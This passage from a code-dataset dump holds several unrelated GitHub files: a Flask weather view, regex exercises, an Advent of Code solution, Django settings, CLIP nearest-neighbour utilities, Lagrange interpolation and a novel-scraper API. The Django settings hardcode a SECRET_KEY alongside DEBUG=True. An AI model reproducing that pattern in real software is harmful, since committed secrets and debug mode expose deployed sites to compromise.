localtime=localtime,\n last_updated_epoch=last_updated_epoch, last_updated=last_updated,\n temp_c=temp_c, temp_f=temp_f, is_day=is_day, condition_text=condition_text,\n condition_icon=condition_icon, wind_mph=wind_mph,\n wind_kph=wind_kph, wind_degree=wind_degree, wind_dir=wind_dir,\n pressure_mb=pressure_mb, pressure_in=pressure_in, precip_mm=precip_mm,\n precip_in=precip_in, humidity=humidity, cloud=cloud, feelslike_c=feelslike_c,\n feelslike_f=feelslike_f, vis_km=vis_km,\n vis_miles=vis_miles, uv=uv, gust_mph=gust_mph, gust_kph=gust_kph)\n except:\n return render_template('home.html', error='Please enter a correct City name...')\n","repo_name":"Ekbal41/Weather-App-With-Flask","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71091530928","text":"#!/usr/bin/python3\n\"\"\" 5-main \"\"\"\n__import__(\"sys\").path.append(\".\")\n\n\ndef main():\n from models.rectangle import Rectangle\n if __name__ == \"__main__\":\n\n r1 = Rectangle(4, 6, 2, 1, 12)\n print(r1)\n\n r2 = Rectangle(5, 5, 1)\n print(r2)\n\n\nmain()\n","repo_name":"Athesto/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/5-main.py","file_name":"5-main.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7606973460","text":"from . import BooleanFeature\nimport nltk\ntry:\n nltk.data.find('tokenizers/punkt')\nexcept LookupError:\n nltk.download('punkt')\n\nmale_pronouns = ['he', 'him', 'himself']\nfemale_pronouns = ['she', 'her', 'herself']\n\nclass GenderFeature(BooleanFeature):\n def __init__(self, gender):\n super(GenderFeature, self).__init__(self.get_gender_predicate(gender), gender)\n\n def get_gender_predicate(self, gender):\n assert gender in ['male', 'female']\n def predicate(s):\n s = nltk.word_tokenize(s)\n male_count = sum(s.count(p) for p in male_pronouns)\n female_count = sum(s.count(p) for p in female_pronouns)\n if gender == 'female':\n return female_count > male_count\n else:\n return male_count > female_count\n return predicate\n","repo_name":"naver/qrs","sub_path":"src/discontrol/scorer/gender.py","file_name":"gender.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11919678120","text":"import re\nimport datetime\n\ntext = 'ID: 123456 This is a testing class with Python with the number 123456'\n# FindAll\nmatching = re.findall('CLASS|tHIS', text, re.IGNORECASE)\n\nfor result in matching:\n print(result)\n\n# Search with replace\nsearch = re.search('123456', text, re.IGNORECASE)\nprint(search)\n\nif search:\n print('Se encontro el valor')\n text = re.sub('123456', '', text, re.IGNORECASE)\nelse:\n print('No se encontro el valor')\n\nprint(text)\n\n# Split\ntext = 'ID:123456 This is a testing class with Python with the number 123456'\n\nsplit = re.split(' ', text)\nprint(split)\n\nconcat = split[4] + ' ' + split[7]\nprint(concat)\n\nfor result in split:\n if result == 'ID:123456':\n print('Se encontró el código')\n break\n\n# Search mas definido\ntext = 'Este texto contiene el valor del Scenario:HOY ahora'\n\nPatronDeBusqueda = r'(?<=Scenario:)\\w+'\n\nvariables = re.findall(str(PatronDeBusqueda), text, re.IGNORECASE)\nfor variable in variables:\n if variable == 'HOY':\n dateToday = str(datetime.date.today().strftime('%d-%m-%Y'))\n text = re.sub('(Scenario:)([^&.]+)', dateToday, text, re.IGNORECASE)\n continue\n\nprint(text)\n\n\n\n","repo_name":"matiasgalvez/Selenium-with-Python","sub_path":"src/test/regular_expressions.py","file_name":"regular_expressions.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5479215643","text":"from collections import Counter, defaultdict\n\n\ndef pairs(x):\n for char_1, char_2 in zip(x, x[1:]):\n yield char_1 + char_2\n\n\ndef main():\n with open(\"data/input_14.txt\", \"r\") as f:\n raw_polymer, *raw_rules = [\n line.rstrip(\"\\n\") for line in f.readlines() if line and line != \"\\n\"\n ]\n\n rules = {}\n for rule in raw_rules:\n pair, replacement = rule.split(\" -> \")\n rules[pair] = replacement\n\n start = raw_polymer[:2]\n end = raw_polymer[-2:]\n polymer = defaultdict(int)\n for pair in pairs(raw_polymer):\n polymer[pair] += 1\n\n steps = 40\n for step in range(1, steps + 1):\n new_polymer = defaultdict(int)\n if start in rules:\n start = start[0] + rules[start]\n if end in rules:\n end = rules[end] + end[-1]\n\n seen = set()\n for pair, replacement in rules.items():\n if pair not in polymer:\n continue\n\n seen.add(pair)\n new_polymer[pair[0] + replacement] += polymer[pair]\n new_polymer[replacement + pair[-1]] += polymer[pair]\n\n for pair, count in polymer.items():\n if pair not in seen:\n new_polymer[pair] += polymer[pair]\n\n polymer = new_polymer\n\n # ignore double counting for now\n raw_counts = defaultdict(int)\n for pair, count in polymer.items():\n raw_counts[pair[0]] += count\n raw_counts[pair[-1]] += count\n\n # #### example counting check ####\n # polymer: NHC\n # polymer pairs counts: NH - 1, HC - 1\n # raw_counts: N - 1, H - 2, C - 1\n # counts: each 1\n counts = {}\n for char, count in raw_counts.items():\n if char == start[0] and char == end[-1]:\n counts[char] = int((count - 2) / 2)\n elif char == start[0] or char == end[-1]:\n counts[char] = int((count + 1) / 2)\n else:\n counts[char] = int(count / 2)\n\n ordered_counts = sorted(counts.items(), key=lambda x: x[1])\n print(ordered_counts[-1][-1] - ordered_counts[0][-1])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"minimav/advent_of_code","sub_path":"2021/puzzle_14_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"1099166659","text":"# Django settings for main project.\nimport os\nimport sys\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nPROJECT_PATH = os.path.dirname(os.path.abspath(__file__))\nADMINS = ()\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'silverlantern_dev.sqlite',\n }\n}\nif os.environ.get('ENV', 'dev') != 'dev':\n import dj_database_url\n DATABASES = {\n 'default': dj_database_url.config(),\n }\n\nLOGIN_URL = \"/login/\"\nAUTH_PROFILE_MODULE = 'main.UserProfile'\nTIME_ZONE = 'UTC'\nLANGUAGE_CODE = 'en-us'\nFIXTURE_DIRS = (\n os.path.join(PROJECT_PATH, 'main', 'sql'),\n)\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nMEDIA_ROOT = ''\nMEDIA_URL = ''\nSTATIC_ROOT = ''\nSTATIC_URL = 'https://s3.amazonaws.com/silverlantern_static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = ()\nSECRET_KEY = '62na=h#x3)k6m&r051hw_sz-9+0(vo9239xbs6d)tf69o!)c#x'\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n #'django.template.loaders.eggs.Loader',\n)\nROOT_URLCONF = 'main.urls'\nWSGI_APPLICATION = 'main.wsgi.application'\nTEMPLATE_DIRS = (os.path.join(PROJECT_PATH, 'templates'),)\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),\n 'PAGINATE_BY': 10\n}\nLOGIN_REDIRECT_URL = '/#/profile'\nSERIALIZATION_MODULES = {\n 'json': 'wadofstuff.django.serializers.json'\n}\nINSTALLED_APPS = (\n 'main',\n 'crispy_forms',\n 'rest_framework',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n #'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n 'django.contrib.admindocs',\n)\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'stream': sys.stdout\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'worker': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n },\n 'main.models': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n },\n 'main.views': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","repo_name":"psbanka/silverlantern","sub_path":"server/main/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"25069536075","text":"def divide_numbers(x, y):\n try:\n result = x / y\n print(f\"Результат деления: {result}\")\n\n except ZeroDivisionError:\n print(\"Ошибка! На ноль делить нельзя!\")\n\n finally:\n print(\"Деление завершено.\")\n\ntry:\n a = float(input(\"Введите числитель: \"))\n b = float(input(\"Введите знаменатель: \"))\n\n divide_numbers(a, b)\n\nexcept ValueError:\n print(\"Ошибка! Некорректный ввод!\")\nfinally:\n print(\"Программа завершена.\")","repo_name":"PolinaNiko/lab2","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17426350223","text":"import csv\nimport sys\nimport math\nfrom datetime import datetime, timedelta\n\nBIN_LENGTH_IN_SECONDS = 60 * 60\n\nsleeps = []\nfirst_day = None\nlast_day = None\nwith open(sys.argv[1]) as f:\n reader = csv.reader(f)\n next(reader)\n for row in reader:\n start = datetime.strptime(row[1], '%m/%d/%y, %I:%M %p')\n end = start + timedelta(minutes=int(row[2]))\n sleeps.append((start, end, (end - start).total_seconds()))\n\n if first_day is None or start < first_day:\n first_day = start\n if last_day is None or end > last_day:\n last_day = end\n\n# first bin is the start of the first day in the range, not the first recorded hour\nbins = [ { \"seconds\": 0, \"count\": 0 } for x in range(math.ceil((last_day - first_day).total_seconds() / BIN_LENGTH_IN_SECONDS))]\nfirst_bin = datetime(first_day.year, first_day.month, first_day.day)\n\nfor (i, bin) in enumerate(bins):\n bin_start = first_bin + timedelta(seconds=BIN_LENGTH_IN_SECONDS * i)\n bin_end = bin_start + timedelta(seconds=BIN_LENGTH_IN_SECONDS)\n for sleep in sleeps:\n starts_before_bin = sleep[0] < bin_start\n starts_during_bin = sleep[0] >= bin_start and sleep[0] < bin_end\n ends_after_bin = sleep[1] > bin_end\n ends_during_bin = sleep[1] >= bin_start and sleep[1] < bin_end\n\n addition = 0\n if starts_during_bin and ends_during_bin:\n addition = sleep[2]\n elif starts_before_bin and ends_after_bin:\n addition = BIN_LENGTH_IN_SECONDS\n elif starts_before_bin and ends_during_bin:\n addition = (sleep[1] - bin_start).total_seconds()\n elif starts_during_bin and ends_after_bin:\n addition = (bin_end - sleep[0]).total_seconds()\n\n if addition > 0:\n bins[i]['seconds'] += addition\n bins[i]['count'] += 1\n\nsummary_bins_week = [ { 'seconds': 0, 'count': 0 } for x in range(int(7 * 24 * 60 * 60 / BIN_LENGTH_IN_SECONDS))]\nsummary_bins_day = [ { 'seconds': 0, 'count': 0 } for x in range(int(24 * 60 * 60 / BIN_LENGTH_IN_SECONDS))]\n\nfor (i, bin) in enumerate(bins):\n bin_start = first_bin + timedelta(seconds=BIN_LENGTH_IN_SECONDS * i)\n bin_end = bin_start + timedelta(seconds=BIN_LENGTH_IN_SECONDS)\n day_of_week = (bin_start.weekday() + 1) % 7\n hour_of_day = bin_start.hour\n\n summary_bin_weekly_i = int(day_of_week * 24 * 60 * 60 / BIN_LENGTH_IN_SECONDS) + int(hour_of_day * 60 * 60 / BIN_LENGTH_IN_SECONDS)\n summary_bin_daily_i = int(hour_of_day * 60 * 60 / BIN_LENGTH_IN_SECONDS)\n\n summary_bins_week[summary_bin_weekly_i]['seconds'] += bin['seconds']\n summary_bins_week[summary_bin_weekly_i]['count'] += 1\n\n summary_bins_day[summary_bin_daily_i]['seconds'] += bin['seconds']\n summary_bins_day[summary_bin_daily_i]['count'] += 1\n\nwith open('day.tsv', 'w') as f:\n writer = csv.writer(f, delimiter='\\t')\n writer.writerow(('hour', 'sleep (min)', 'count', 'avg (min)'))\n for (i, bin) in enumerate(summary_bins_day):\n row = [i]\n row.append(bin['seconds'] / 60.0)\n row.append(bin['count'])\n row.append(bin['seconds'] / (bin['count'] * 60.0))\n writer.writerow(row)\n\nwith open('week.tsv', 'w') as f:\n writer = csv.writer(f, delimiter='\\t')\n writer.writerow(('dow', 'hour', 'sleep (min)', 'count', 'avg (min)'))\n for (i, bin) in enumerate(summary_bins_week):\n row = []\n row.append(math.floor(i * 60 * 60 / (BIN_LENGTH_IN_SECONDS * 24))) # day of week\n row.append((i * 60 * 60 / BIN_LENGTH_IN_SECONDS) % 24) # hour of day\n row.append(bin['seconds'] / 60.0)\n row.append(bin['count'])\n row.append(bin['seconds'] / (bin['count'] * 60.0))\n writer.writerow(row)\n\n","repo_name":"sbma44/ellieviz","sub_path":"calc_sleep.py","file_name":"calc_sleep.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20204372581","text":"#Кобяшова Дарья Александровна 3 курс 4 группа\r\n\r\n#Написать программы для нахождения промежуточных значений и построить графики функции, заданной в n точках:\r\n#посредством построения полинома Лагранжа.\r\n#Многочлен Лагранжа ищется в виде линейной комбинации из значений 𝑦 = 𝑓(𝑥) в 𝑖-ых узлах интерполяции и специально построенных \r\n#из системы узлов интерполяции многочленов 𝐿𝑛(𝑥) 𝑛 -ой степени\r\n\r\n\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nfrom generanor import *\r\n\r\ndef data_read(path: str): #определение функции чтения данных из файла\r\n f = open(path, 'r')\r\n l = f.readline() #чтение первой строки\r\n data = list()\r\n while(l):\r\n x = [float(num) for num in l.split('\\n')[0].split(', ')] #получение из строки список чисел для х\r\n l = f.readline() #чтение второй строки\r\n y = [float(num) for num in l.split('\\n')[0].split(', ')] #получение из строки список чисел для у\r\n data.append([x, y])\r\n l = f.readline() #чтение строки-разграничителя\r\n l = f.readline() #чтение следующей(новой первой) строки\r\n return data\r\n\r\ndef interpol(data, x_found):\r\n for i in range(len(data)):\r\n func = 0\r\n y_interpol = 0\r\n x = np.linspace(data[i][0][0], data[i][0][-1]) #определение интервала\r\n for j in range(len(data[i][0])): #прохождение по одному набору\r\n numerator = 1\r\n numerator_ = 1\r\n denominator = 1 \r\n for k in range(len(data[i][0])):\r\n if k != j:\r\n numerator *= x - data[i][0][k] #выисление числителя\r\n numerator_ *= x_found - data[i][0][k] #выисление числителя\r\n denominator *= data[i][0][j] - data[i][0][k] #вычисление знаменателя\r\n func += data[i][1][j] * (numerator/denominator) #вычисление многочлена Лагранжа \r\n y_interpol += data[i][1][j] * (numerator_/denominator)\r\n plt.plot(x, func, c='k') #соединение точек \r\n if x_found >= min(data[i][0]) and x_found <= max(data[i][0]):\r\n plt.scatter(x_found, y_interpol, c='r', marker='*', s= 150) #искомая точка\r\n plt.scatter(data[i][0], data[i][1]) #прохождение по наборам данных\r\n plt.show()\r\n\r\nprint('Введите значение x искомой точки')\r\nx_found = float(input())\r\n\r\ninterpol(data_read('task3/task3.3.txt'), x_found)","repo_name":"woegoru/Math-modeling","sub_path":"task3/lagrange-polynomial.py","file_name":"lagrange-polynomial.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2126595930","text":"from typing import Dict, List, Set, Tuple\n\nimport clip\nfrom loguru import logger\nfrom nltk.corpus import wordnet as wn\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.multiprocessing\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom src import datasets, utils\n\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n\ndef add_clip_visual_similarity_info_to_df(df: pd.DataFrame, dataset: str = 'imagenet') -> pd.DataFrame:\n SELECT_TOP_K = 10\n topk_train_indices, topk_train_targets = get_clip_knns(dataset)\n topk_train_indices = topk_train_indices[:, :SELECT_TOP_K]\n topk_train_targets = topk_train_targets[:, :SELECT_TOP_K]\n df['clip_top10_train_indices'] = topk_train_indices.tolist()\n df['clip_top10_train_targets'] = topk_train_targets.tolist()\n return df\n\n\ndef get_clip_knns(dataset: str = 'imagenet'):\n valid_clip_knn = utils.get_artefacts_path() / dataset / 'valid_clip_knn.npz'\n CACHE_SELECT_K = 50\n\n if valid_clip_knn.is_file():\n loaded = np.load(valid_clip_knn)\n topk_train_indices, topk_train_targets = loaded['topk_train_indices'], loaded['topk_train_targets']\n assert topk_train_indices.shape == topk_train_targets.shape == (utils.NUM_SAMPLES[dataset], CACHE_SELECT_K)\n return topk_train_indices, topk_train_targets\n\n logger.info('Compute CLIP kNNs (from the training images) for the validation set')\n # CLIP embeddings computed on the ImageNet training set\n train_files, train_targets, train_embeddings = get_train_clip_embeddings()\n device, model, preprocess = get_clip_model()\n train_embeddings = torch.from_numpy(train_embeddings).to(device)\n train_targets = torch.from_numpy(train_targets)\n\n valid_dset = datasets.get_dataset(dataset=dataset, split='val', transform=preprocess)\n data_loader = DataLoader(valid_dset, batch_size=128, shuffle=False, num_workers=4)\n\n with torch.no_grad():\n all_topk_train_indices = []\n all_topk_train_targets = []\n for _, inputs, _, _ in tqdm(data_loader, ncols=150, leave=False):\n val_features = model.encode_image(inputs.to(device))\n val_features /= val_features.norm(dim=-1, keepdim=True)\n similarity = val_features @ train_embeddings.T\n\n _, topk_train_indices = torch.topk(similarity, CACHE_SELECT_K, dim=-1, largest=True, sorted=True)\n topk_train_indices = topk_train_indices.cpu()\n topk_train_targets = train_targets[topk_train_indices]\n\n all_topk_train_indices.append(topk_train_indices)\n all_topk_train_targets.append(topk_train_targets)\n\n all_topk_train_indices = torch.cat(all_topk_train_indices).numpy()\n all_topk_train_targets = torch.cat(all_topk_train_targets).numpy()\n\n assert all_topk_train_indices.shape == (utils.NUM_SAMPLES[dataset], CACHE_SELECT_K)\n assert all_topk_train_targets.shape == (utils.NUM_SAMPLES[dataset], CACHE_SELECT_K)\n\n np.savez_compressed(\n valid_clip_knn,\n topk_train_indices=all_topk_train_indices,\n topk_train_targets=all_topk_train_targets\n )\n\n return all_topk_train_indices, all_topk_train_targets\n\n\ndef get_clip_model():\n device = utils.get_device()\n model, preprocess = clip.load('ViT-L/14@336px', device)\n return device, model, preprocess\n\n\ndef get_train_clip_embeddings():\n train_clip_embeddings_path = utils.get_artefacts_path() / 'train_clip_embeddings.npz'\n\n if train_clip_embeddings_path.is_file():\n logger.info('Load cached CLIP embeddings of the training images.')\n loaded = np.load(train_clip_embeddings_path)\n train_files, targets, embeddings = loaded['train_files'], loaded['targets'], loaded['embeddings']\n train_files = train_files.tolist()\n assert targets.ndim == 1 and embeddings.ndim == 2\n assert len(train_files) == targets.shape[0] == embeddings.shape[0]\n logger.info('Loading completed')\n return train_files, targets, embeddings\n\n logger.info('Compute the CLIP embeddings of the ImageNet training images.')\n device, model, preprocess = get_clip_model()\n\n imagenet_train_dset = datasets.get_dataset(dataset='imagenet', split='train', transform=preprocess)\n paths_prefix = imagenet_train_dset.root + '/'\n data_loader = DataLoader(imagenet_train_dset, batch_size=128, shuffle=False, num_workers=4)\n\n with torch.no_grad():\n train_files_list = []\n all_targets = []\n all_features = []\n for paths, inputs, targets, _ in tqdm(data_loader, ncols=150, leave=False):\n paths = list(paths)\n assert all(p.startswith(paths_prefix) for p in paths)\n paths = [p[len(paths_prefix):] for p in paths]\n train_files_list.extend(paths)\n\n all_targets.append(targets)\n\n features = model.encode_image(inputs.to(device))\n features /= features.norm(dim=-1, keepdim=True)\n features = features.cpu()\n all_features.append(features)\n\n all_targets = torch.cat(all_targets).numpy()\n all_features = torch.cat(all_features).numpy()\n\n assert all_targets.ndim == 1 and all_features.ndim == 2\n assert len(train_files_list) == all_targets.shape[0] == all_features.shape[0]\n\n logger.info('Cache/save the CLIP embeddings of the training images.')\n np.savez_compressed(\n train_clip_embeddings_path,\n train_files=np.array(train_files_list),\n targets=all_targets,\n embeddings=all_features\n )\n\n return train_files_list, all_targets, all_features\n\n\ndef get_wnet_proposals(\n wnet_id_pred: str, wnet_id_target: str, wnet_id_to_superclass: Dict[str, Set[str]], debug_oov: bool = False\n) -> List[Tuple[str, int]]:\n assert wnet_id_pred != wnet_id_target\n wn_synset_pred = wn.synset_from_pos_and_offset(wnet_id_pred[0], int(wnet_id_pred[1:]))\n wn_synset_target = wn.synset_from_pos_and_offset(wnet_id_target[0], int(wnet_id_target[1:]))\n blocking_ancestors: Set[int] = {node.offset() for path in wn_synset_target.hypernym_paths() for node in path}\n\n class Proposals:\n\n def __init__(self):\n self.proposals = []\n self.proposals_offset_set = set()\n\n def add_proposal_from_synset(self, synset):\n if synset.offset() in self.proposals_offset_set:\n return\n if debug_oov:\n for lemma_name in synset.lemma_names():\n print(synset.offset(), lemma_name.lower().replace('_', ' '))\n self.proposals.append(synset)\n self.proposals_offset_set.add(synset.offset())\n\n def to_lemma_names_list(self) -> List[Tuple[str, int]]:\n return [\n (lemma_name.lower().replace('_', ' '), proposed_synset.offset())\n for proposed_synset in self.proposals for lemma_name in proposed_synset.lemma_names()\n ]\n\n if debug_oov: print('IV and OOV proposals:')\n\n proposals = Proposals()\n assert wn_synset_pred.offset() not in blocking_ancestors, \\\n f'Maybe should be fine-grained in-voc: target={wnet_id_target}, pred={wnet_id_pred}'\n # proposals.add_proposal_from_synset(wn_synset_target)\n if debug_oov: print('* Predicted node')\n proposals.add_proposal_from_synset(wn_synset_pred)\n\n if debug_oov: print('* Same superclass with the predicted node')\n # Add from same superclass\n for wnet_id, superclass_set in wnet_id_to_superclass.items():\n if not wnet_id_to_superclass[wnet_id_pred].isdisjoint(superclass_set):\n synset = wn.synset_from_pos_and_offset(wnet_id[0], int(wnet_id[1:]))\n assert synset.offset() not in blocking_ancestors, \\\n f'Maybe should be fine-grained in-voc: target={wnet_id_target}, pred={wnet_id_pred}, ' + \\\n f'same superset clash={synset.offset()}'\n proposals.add_proposal_from_synset(synset)\n\n if debug_oov: print('* Direct siblings of the predicted node')\n # Propose the direct siblings of the predicted node\n pred_direct_parents = wn_synset_pred.hypernyms()\n for direct_parent in pred_direct_parents:\n for pred_sibling in direct_parent.hyponyms():\n if pred_sibling.offset() not in blocking_ancestors:\n proposals.add_proposal_from_synset(pred_sibling)\n\n # Ancestors of the predicted node (which are not also ancestors of the target)\n META_LABELS = [\n # From the ImageNet-X paper\n 'device',\n 'dog',\n 'commodity',\n 'bird',\n 'structure',\n 'covering',\n 'wheeled_vehicle',\n 'food',\n 'equipment',\n 'insect',\n 'vehicle',\n 'furniture',\n 'primate',\n 'vessel',\n 'snake',\n 'natural_object',\n\n # more general\n 'organism',\n 'geological_formation',\n 'clothing',\n 'container'\n ]\n\n if debug_oov: print('* (Valid) parents of the predicted node')\n for path in wn_synset_pred.hypernym_paths():\n covered_by_meta_label = False\n for node in path:\n if not covered_by_meta_label and any(meta_label in node.lemma_names() for meta_label in META_LABELS):\n covered_by_meta_label = True\n if node.offset() in blocking_ancestors:\n continue\n if covered_by_meta_label:\n proposals.add_proposal_from_synset(node)\n\n return proposals.to_lemma_names_list()\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"eth-sri/automated-error-analysis","sub_path":"src/utils_clip.py","file_name":"utils_clip.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"526713133","text":"a = input('Where do you live?')\r\nif a == 'Kazan' or a == 'Moscow' or a == 'Home':\r\n b = input('Who can lift and move both a horse and an elephant?')\r\n if b == 'Strongman' or b == 'Nobody' or b == 'Chess player':\r\n c = input('What was “tomorrow” yesterday, and tomorrow will be “yesterday”?')\r\n if c == 'I do not know' or c == 'Today' or c == 'Something':\r\n if b == 'Strongman' and c == 'Something':\r\n print('Result: You are an urban commoner! (Your IQ = 35.)')\r\n elif a == 'Kazan' and c == 'I do not know':\r\n print('Result: You Kazan know-nothing man! (Your IQ = 27.)')\r\n elif a == 'Moscow' and c == 'I do not know':\r\n print('Result: You Moscow know-nothing man! (Your IQ = 20.)')\r\n elif a == 'Home' and b == 'Chess player' and c == 'Today':\r\n print('Result: You are a tricky expert! (Your IQ = 100!)')\r\n elif a == 'Kazan' or a == 'Moscow' or a == 'Home':\r\n print('Result: You are not an easy urban commoner! (Your IQ = 56.)')\r\n else:\r\n print('Error!')\r\n else:\r\n print('Error!')\r\nelse:\r\n print('Error!')\r\n","repo_name":"ArseniyCool/Python-YandexLyceum2019-2021","sub_path":"Основы программирования Python/2. Сonditional operator/ENG/IQ test.py","file_name":"IQ test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42838457594","text":"import cv2\nimport numpy as np\nimport json\nimport os\n\n\n#Imagen a introducir en un nuevo\ndirectorioActual = os.path.abspath(\"\")\n\ncarpetaImagen = \"imagenes\"\nnombreImagen = \"TemploSaturnoAhora\"\nextensionImagen = \".jpg\"\n\nnombreImagenNueva = \"TemploSAturnoAntes\"\nextensionImagenNueva = \".jpg\"\n\nimagenAJson=os.path.join(directorioActual, carpetaImagen, nombreImagen + extensionImagen)\nimgLigada=os.path.join(directorioActual, carpetaImagen, nombreImagenNueva + extensionImagenNueva)\n\nimg = cv2.imread(imagenAJson)\n\nimggris = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nimgh, imgw, _ = img.shape\n\n\nF = cv2.SIFT_create()\n\nkpimg, descimg = F.detectAndCompute(imggris, None)\n\ntemp = [{'point0':k.pt[0],'point1':k.pt[1],'size':k.size,'angle': k.angle, 'response': k.response, \"octave\":k.octave,\n \"id\":k.class_id} for k in kpimg]\ndata = {\n \"kpimg\":temp,\n \"descimg\": descimg.tolist(),\n \"imgh\": imgh,\n \"imgw\": imgw ,\n \"imagenLigada\": imgLigada\n #\"nombreWikipedia\":\n}\n\ncarpetaJson = \"KPJsons\"\njsonExt = \".json\"\n\narchivoIntroducir=os.path.join(directorioActual, carpetaJson, nombreImagen + jsonExt)\n\n\nwith open(archivoIntroducir, 'w') as archivo:\n json.dump(data, archivo)\n\n","repo_name":"javigp2002/proyectoCUIA","sub_path":"importarAJSON.py","file_name":"importarAJSON.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7042288481","text":"from config import *\nfrom lib import *\n\ndef get_web_url(url: str):\n if url[0] != \"/\":\n url = \"/\" + url\n return Vars.current_book_type + url.replace(Vars.current_book_type, \"\")\n\n\nclass Response:\n @staticmethod\n def get_book_info_by_book_id(book_id: str):\n if Vars.current_book_type == \"https://www.qbtr.cc\":\n url = Vars.current_source.url.book_info.format(Vars.current_book_classify_name, book_id)\n elif Vars.current_book_type == \"http://www.trxs.cc\":\n url = Vars.current_source.url.book_info.format(Vars.current_book_classify_name, book_id)\n elif Vars.current_book_type == \"https://www.xbiquge.la\":\n url = Vars.current_source.url.book_info.format(book_id[:2], book_id)\n else:\n url = Vars.current_source.url.book_info.format(book_id)\n Vars.current_book_id = book_id\n return lib.utils.get(api_url=url)\n\n @staticmethod\n def get_chapter_info_by_chapter_id(chapter_url: str):\n if Vars.current_book_type == \"http://www.80zw.net\":\n url = Vars.current_source.url.chapter_info.format(Vars.current_book.book_id, chapter_url)\n elif Vars.current_book_type == \"https://www.qb5.la\":\n url = Vars.current_source.url.chapter_info.format(Vars.current_book.book_id, chapter_url)\n else:\n url = Vars.current_source.url.chapter_info.format(chapter_url)\n result = lib.utils.get(api_url=url)\n return result\n\n @staticmethod\n def get_catalogue_info_by_book_id(book_id: str):\n return lib.utils.get(api_url=Vars.current_source.url.catalogue_info.format(book_id))\n\n @staticmethod\n def get_book_info_by_keyword(method: str, params: dict = None):\n response = lib.utils.get(method=method, params=params, api_url=Vars.current_source.url.search_info)\n # return list(zip(\n # # response.xpath(Vars.current_book_rule.Search.book_name),\n # # response.xpath(Vars.current_book_rule.Search.book_id)\n # ))\n","repo_name":"VeronicaAlexia/linovel","sub_path":"api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"2"} +{"seq_id":"27010739516","text":"import sys\nimport os\n\n'''\nThis file configures file paths for locating the ACL2 model, setting the\noutput directory etc. and some general options.\n'''\n\n\n###############################################################################\n# File 